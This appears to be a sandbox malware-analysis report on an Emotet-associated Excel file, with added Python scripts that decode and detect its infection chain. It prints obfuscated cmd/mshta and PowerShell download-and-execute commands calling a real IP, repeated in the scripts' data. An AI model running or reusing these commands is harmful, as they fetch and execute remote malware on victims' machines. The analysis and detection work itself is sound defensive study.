| Field | Value |
|---|---|
| File name | Info_774757202.xls |
| Full analysis | https://app.any.run/tasks/72674a47-af57-4719-82f3-a2abff1202a1 |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a very destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
| Analysis date | January 24, 2022, 23:55:05 |
| OS | Windows 7 Professional Service Pack 1 (build 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.ms-excel |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 24 14:50:55 2022, Last Saved Time/Date: Mon Jan 24 15:24:17 2022, Security: 0 |
| MD5 | 661C7531C880D43EA79ABCFDD601CB88 |
| SHA1 | FB9D14DC1589C48AF985B83882A4191E8CAC0790 |
| SHA256 | 48381201170794D6DDBC713A1A5BC89CE39472D3EB35A9173FA84D992AA9DFDC |
| SSDEEP | 3072:AH+Hyms/k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIixe53lGvFTQ3IzxgdrvxpU0f:e+Hyms/k3hbdlylKsgqopeJBWhZFVE+i |
Detected file type: .xls, Microsoft Excel sheet (78.9)

Document metadata:

| Property | Value |
|---|---|
| HeadingPairs | |
| TitleOfParts | |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 16 |
| Company | - |
| CodePage | Windows Cyrillic |
| Security | None |
| ModifyDate | 2022:01:24 15:24:17 |
| CreateDate | 2022:01:24 14:50:55 |
| Software | Microsoft Excel |
| LastModifiedBy | xXx |
| Author | xXx |

The metadata places the document's creation in Excel 16 (AppVersion 16) on Windows 10 with the Cyrillic code page 1251, about half an hour before it was last saved and roughly nine hours before this analysis; the sandbox opened it in Excel 14 on Windows 7, so the behaviour below is that of an older Office build than the author's.
Processes (all run as user admin at MEDIUM integrity; all images carry Microsoft Corporation version information; no behaviour indicators were flagged on any of them):

| PID | Parent | Command line | Path | Image (version) |
|---|---|---|---|---|
| 2152 | Explorer.EXE | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Microsoft Excel 14.0.6024.1000 |
| 276 | EXCEL.EXE | cmd /c ms^ht^a ht^t^p:/^/0x^5cf^f^39c^3^/^sec^/^se4.html | C:\Windows\system32\cmd.exe | Windows Command Processor 6.1.7601.17514 (win7sp1_rtm.101119-1850), exit code 0 |
| 2856 | cmd.exe | mshta http://0x5cff39c3/sec/se4.html | C:\Windows\system32\mshta.exe | Microsoft (R) HTML Application host 11.00.9600.16428 (winblue_gdr.131013-1700), exit code 0 |
| 2656 | mshta.exe | powershell.exe -noexit (see the full command line below) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Windows PowerShell 10.0.14409.1005 (rs1_srvoob.161208-1155) |

Full command line of PID 2656:

```text
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se4.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
```

Chain: Excel (PID 2152) spawns cmd.exe (PID 276), which launches mshta.exe (PID 2856) with a caret-escaped URL whose host is the hex-encoded IP 0x5cff39c3, i.e. 92.255.57.195. The HTA then starts PowerShell (PID 2656); its one-liner rebuilds (New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se4.png') from chunks padded with the junk placeholder {GOOGLE} and pipes the result to Invoke-Expression, spelled with backticks inserted into IEX, which PowerShell ignores. Both stages therefore pull from the same host that the connection table records for mshta.exe and powershell.exe.
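The two command lines in the process table hide the download chain with cheap tricks: cmd.exe caret escapes plus a hex-encoded IP on the mshta stage, and a placeholder-padded chunk-and-join with a backtick-split IEX on the PowerShell stage. The script below is an added example for this page, not ANY.RUN's code and not the sample's code; it recovers both stages offline from the command lines copied from the table. CMD_LINE and PS_LINE are those copied lines; the function names are this example's own, and the handling of plain-decimal IP literals goes beyond what the page shows.

```python
"""Recover the stage-1 and stage-2 URLs from the obfuscated command lines in
the process table.  Added example for this page; not ANY.RUN code and not
the sample's code.  CMD_LINE and PS_LINE are copied from the table (PIDs 276
and 2656); function names and the decimal-IP case are this example's own."""
import ipaddress
import re

# Copied from the process table: the cmd.exe child of EXCEL.EXE (PID 276).
CMD_LINE = r"cmd /c ms^ht^a ht^t^p:/^/0x^5cf^f^39c^3^/^sec^/^se4.html"

# Copied from the process table: the PowerShell child of mshta.exe (PID 2656).
PS_LINE = (
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit '''
    r"""$c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); """
    r"""$c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); """
    r"""$c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se4.png'')'.replace('{GOOGLE}', '');"""
    r"""$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"""
)

URL_RE = re.compile(r"https?://[^\s'\")]+")


def strip_cmd_carets(s: str) -> str:
    """Undo cmd.exe caret escaping: '^x' is the literal x, so '^^' is one caret."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def normalize_host(host: str) -> str:
    """Rewrite a hex (0x5cff39c3) or plain-decimal IPv4 literal as a dotted quad.

    The hex form is what mshta was given, and the report shows it reaching
    92.255.57.195.  The decimal form is handled as a generalization (example's
    own choice).  Dotted IPs and hostnames are returned unchanged."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]{1,8}", host):
        return str(ipaddress.IPv4Address(int(host, 16)))
    if re.fullmatch(r"\d{1,10}", host) and int(host) <= 0xFFFFFFFF:
        return str(ipaddress.IPv4Address(int(host)))
    return host


def normalize_urls(text: str) -> str:
    """Apply normalize_host to the host part of every http(s) URL in text."""
    return re.sub(r"(https?://)([^/\s:'\")]+)",
                  lambda m: m.group(1) + normalize_host(m.group(2)), text)


def deobfuscate_powershell(cmdline: str) -> dict:
    """Rebuild the string the chunk-and-join one-liner feeds to Invoke-Expression.

    Pattern: several $var='...' literals padded with a junk placeholder, each
    cleaned with .replace('<placeholder>', ''), then -Join'ed and piped to I`E`X."""
    ph = re.search(r"\.replace\('((?:''|[^'])+)',\s*''\)", cmdline, re.IGNORECASE)
    placeholder = ph.group(1) if ph else None
    literals = {}
    for name, body in re.findall(r"\$(\w+)\s*=\s*'((?:''|[^'])*)'", cmdline):
        if placeholder:
            body = body.replace(placeholder, "")
        literals[name] = body.replace("''", "'")  # PowerShell's '' escape
    order = list(literals)
    joined = re.search(r"\(\s*((?:\$\w+\s*,\s*)*\$\w+)\s+-join\b", cmdline, re.IGNORECASE)
    if joined:
        order = re.findall(r"\$(\w+)", joined.group(1))
    payload = normalize_urls("".join(literals.get(n, "") for n in order))
    # Backticks inside a bare word are no-ops in PowerShell: I`E`X == IEX.
    invokes = bool(re.search(r"\b(iex|invoke-expression)\b",
                             cmdline.replace("`", ""), re.IGNORECASE))
    return {"placeholder": placeholder, "payload": payload,
            "urls": URL_RE.findall(payload), "invokes_expression": invokes}


def recover_chain(cmd_line: str, ps_line: str) -> dict:
    """Stage 1 (cmd -> mshta) and stage 2 (mshta -> powershell) in one summary."""
    mshta_cmd = normalize_urls(strip_cmd_carets(cmd_line))
    ps = deobfuscate_powershell(ps_line)
    return {
        "mshta_command": mshta_cmd,
        "stage1_url": URL_RE.findall(mshta_cmd)[0],
        "stage2_payload": ps["payload"],
        "stage2_url": ps["urls"][0],
        "placeholder": ps["placeholder"],
        "invokes_expression": ps["invokes_expression"],
    }


if __name__ == "__main__":
    for key, value in recover_chain(CMD_LINE, PS_LINE).items():
        print(f"{key:20} {value}")
```

Running it yields http://92.255.57.195/sec/se4.html for the mshta stage, matching both the de-escaped mshta command line and the HTTP request row, and (New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se4.png') for the PowerShell stage, matching the powershell.exe connection to the same host. The placeholder is learned from the .replace() call rather than hard-coded, so the same routine handles samples that pad with a different junk token.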
Files created or modified:

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2152 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR2DA4.tmp.cvr | — | — | — |
| 2856 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\se4[1].htm | binary | EE3D40A393DFC20684FDCD4282DA0284 | 2C8F62708A16B068433ED479A0E16143257BD15B91EF904F30642CD0E24716DD |
| 2152 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini | 10A06E44FA557E4ACDC37A96D3628AD1 | CC1DCE7BEA7261049C9955CCEBFC5FF90D09558C95732AF04F5F34599B261D6C |
| 2152 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Info_774757202.xls.LNK | lnk | 0AE9C087F4AC4877297C2ACB5749D090 | 9818F5204D20A251F8F040759E0E8CBABD5A3FD522937B63270197ABAA4034FC |
| 2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\juqkklfv.2yk.psm1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| 2656 | powershell.exe | C:\Users\admin\AppData\Local\Temp\rprbq0rt.eho.ps1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
| 2656 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | 1068BF0B9B98C206F587A7DB05F6DD06 | 534478EDAFC5087DAA3749624454988B1F7DF923BF1A0A9E28C5F97C3308CFDB |

The only retrieved stage that reaches disk is the IE cache copy of se4.html (se4[1].htm, MD5 EE3D40A393DFC20684FDCD4282DA0284) written by mshta.exe. The two temp files written by powershell.exe share MD5 C4CA4238A0B923820DCC509A6F75849B and SHA256 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B, which are the hashes of the single character "1": they are the one-byte probe files PowerShell writes at startup to test script-execution policy, not a dropped payload, and the same holds for ModuleAnalysisCache. The .cvr file is Excel's own crash-recovery artifact.
HTTP requests:

| PID | Process | Method | HTTP code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 2856 | mshta.exe | GET | 200 | 92.255.57.195:80 | http://92.255.57.195/sec/se4.html | RU | binary | 10.9 KB | malicious |
Connections:

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2656 | powershell.exe | 92.255.57.195:80 | — | Telecom SP Ltd | RU | malicious |
| 2856 | mshta.exe | 92.255.57.195:80 | — | Telecom SP Ltd | RU | malicious |

The powershell.exe connection corresponds to the DownloadString of http://92.255.57.195/sec/se4.png in its command line; the report records no HTTP request row and no downloaded file for it, so the second stage is only evidenced by the connection itself. Both processes talk to the same IP, no domain is involved, and the host is reached directly by address.
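The process lineage and command-line artifacts above are what a detection engineer would alert on rather than the specific URL. The following is an added example for this page, not ANY.RUN's code: a small rule set run over events constructed from the process table (PIDs, parents, images and command lines; the PowerShell line is shortened to its obfuscation markers) in a minimal Sysmon-like shape. The rule names, the lists of Office and shell images, and the caret threshold are this example's own choices.

```python
"""Process-lineage and command-line detections for the chain in this report.
Added example for this page, not ANY.RUN's code.  EVENTS is constructed from
the process table in a minimal Sysmon-like shape; rule names, image lists
and thresholds are this example's own."""
import re

# Constructed from the process table above; not a real Sysmon export.
EVENTS = [
    {"pid": 2152, "parent": "Explorer.EXE",
     "image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde'},
    {"pid": 276, "parent": "EXCEL.EXE",
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd /c ms^ht^a ht^t^p:/^/0x^5cf^f^39c^3^/^sec^/^se4.html"},
    {"pid": 2856, "parent": "cmd.exe",
     "image": r"C:\Windows\system32\mshta.exe",
     "cmdline": r"mshta http://0x5cff39c3/sec/se4.html"},
    {"pid": 2656, "parent": "mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # Shortened: only the obfuscation markers of the original line are kept.
     "cmdline": r"powershell.exe -noexit $c1='...'.replace('{GOOGLE}', '');I`E`X $JI|I`E`X"},
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
          "cscript.exe", "rundll32.exe", "regsvr32.exe"}
LOLBIN_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (or of a bare image name)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rules_for(ev: dict) -> list:
    """Return the names of every rule the event trips, in evaluation order."""
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    hits = []
    if parent in OFFICE and image in SHELLS:
        hits.append("office_spawns_shell")
    if parent in LOLBIN_PARENTS and image == "powershell.exe":
        hits.append("lolbin_spawns_powershell")
    # Three or more carets in one command line almost never occur legitimately.
    if cmd.count("^") >= 3:
        hits.append("caret_obfuscation")
    # Host written as a hex literal instead of a dotted IP or a name.
    if re.search(r"https?://0x[0-9a-f]+", cmd, re.IGNORECASE):
        hits.append("hex_ip_url")
    # .replace('<junk>', '') cleaning of padded string chunks.
    if re.search(r"\.replace\('[^']+',\s*''\)", cmd, re.IGNORECASE):
        hits.append("placeholder_replace")
    # IEX / Invoke-Expression that only appears once backticks are removed.
    if "`" in cmd and re.search(r"\b(iex|invoke-expression)\b",
                                cmd.replace("`", ""), re.IGNORECASE):
        hits.append("backtick_split_iex")
    return hits


def evaluate(events: list) -> dict:
    """Map each PID to the rules it trips; an empty list means no finding."""
    return {ev["pid"]: rules_for(ev) for ev in events}


if __name__ == "__main__":
    for pid, hits in evaluate(EVENTS).items():
        print(pid, hits or "-")
```

Excel itself (PID 2152) trips nothing; each later stage trips at least one rule, and the two lineage rules fire without any knowledge of the URL or placeholder, which is what makes them hold up when the operator rotates infrastructure. The caret and hex-IP rules are deliberately separate: the caret-escaped cmd line hides the hex host from a naive URL regex, so only the de-escaped mshta line matches it.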